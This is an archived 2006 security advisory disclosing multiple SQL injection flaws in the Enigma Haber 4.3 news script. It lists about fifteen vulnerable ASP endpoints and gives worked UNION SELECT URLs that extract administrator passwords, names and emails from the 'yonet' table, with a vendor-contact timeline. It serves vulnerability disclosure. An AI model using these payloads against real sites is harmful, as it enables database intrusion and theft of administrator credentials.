EnigmaHaber-4.3.txt

EnigmaHaber-4.3.txt: Posted May 29, 2006; Site nukedx.com; Enigma Haber versions less than or equal to 4.3 suffer from multiple SQL injection vulnerabilities.; tags | advisory, vulnerability, sql injection; SHA-256 | 6a42cbb6c33032e0870bfd953d93aec44ac1962300a25f2f658c9b797ea71a9c; Download | Favorite | View

EnigmaHaber-4.3.txt

--Security Report--
Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 05:16 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: EnigmaASP (http://www.enigmaasp.net/)
Version: 4.3 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL  
queries to EnigmaHaber.See the examples.
Level: Critical
---
How&Example:
GET -> http://[site]/enigmadir/e_mesaj_yaz.asp?id=SQL
EXAMPLE ->  
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,
0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
GET -> http://[site]/enigmadir/yazdir.asp?hid=SQL
GET -> http://[site]/enigmadir/yorum.asp?hid=SQL
GET -> http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
GET ->  
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
GET ->  
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc[SQL]&ay=00&yil=00&e_kad=00
EXAMPLE ->  
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
GET -> http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights.
GET -> http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
EXAMPLE ->  
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+
yonet+where+yonetid=1144927664
GET -> http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
GET -> http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
GET -> http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
GET -> http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
GET -> http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
GET -> http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
GET -> http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
--
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=34
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34

Top Authors In Last 30 Days

Red Hat 216 files
Ubuntu 78 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

EnigmaHaber-4.3.txt

EnigmaHaber-4.3.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

EnigmaHaber-4.3.txt

Share This

EnigmaHaber-4.3.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems